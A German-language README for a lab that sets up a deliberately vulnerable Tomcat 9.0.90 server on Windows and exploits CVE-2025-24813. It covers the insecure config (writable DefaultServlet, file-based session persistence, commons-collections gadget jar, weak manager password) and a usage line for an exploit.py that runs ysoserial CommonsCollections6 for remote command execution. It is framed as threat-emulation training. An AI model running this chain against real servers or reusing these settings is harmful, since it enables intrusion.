
Anleitung zur schnellen Bereitstellung von Tomcat v9.0.90 mit java 25.0.1 2025-10-21 LTS auf Windows Server 2019 Standard für faule Forscher.
Dieses Repository soll klare Anweisungen für die schnelle Bereitstellung von Tomcat v9.0.90 mit java 25.0.1 2025-10-21 LTS auf Windows Server 2019 Standard für Cybersicherheits-Übungen zur Bedrohungsemulation bieten. Die exploit.py nutzt ysoserial-all.jar, um einen Payload mit dem Modul CommonsCollections6 in ysoserial-all.jar zu erstellen, der später von der Abhängigkeit commons-collections-3.2.1.jar in %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib deserialisiert wird.
Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
1. Klicken Sie auf Start
2. Geben Sie "Systemumgebungsvariablen bearbeiten" ein
3. Erstellen Sie zwei neue Systemvariablen mit den Namen
- `%JAVA_HOME%` mit dem Wert `C:\jdk-25.0.1`
- `%CATALINA_HOME%` mit dem Wert `C:\apache-tomcat-9.0.90`
4. Bearbeiten Sie die Systemvariable `Path` und fügen Sie folgende Werte hinzu:
- `%JAVA_HOME%\bin`
- `%CATALINA_HOME%\bin`
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
tomcat-users.xml im Ordner tomcat-9.0.90\conf und fügen Sie Folgendes VOR </tomcat-users> hinzu:<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
context.xml im Ordner tomcat-9.0.90\conf und ersetzen Sie den GESAMTEN Inhalt durch Folgendes:<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
<Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
</Context>
web.xml im Ordner tomcat-9.0.90\conf, suchen Sie nach DefaultServlet und ersetzen Sie das gesamte <servlet></servlet> durch Folgendes:<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
shutdown.bat
startup.bat
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
index.html in C:\tomcat-9.0.90\webapps\ROOT, um es schicker aussehen zu lassen.<Connector port="443"
protocol="org.apache.coyote.http11.Http11NioProtocol"
maxThreads="150"
SSLEnabled="true"
scheme="https"
secure="true">
<SSLHostConfig>
<Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
certificateKeystorePassword=""
certificateKeystoreType="PKCS12" />
</SSLHostConfig>
</Connector>
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow
exploit.pygit clone <this-repo-url>
cd CVE-2025-24813
pip install requests
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
exploit.py werden zwei Sitzungsdateien in C:\tomcat-9.0.90\webapps\ROOT und C:\tomcat-9.0.90\work\Catalina\localhost\ROOT mit einem zufälligen Namen erstellt. Die .session-Datei im Arbeitsordner sollte einige Sekunden nach der Ausführung gelöscht werden.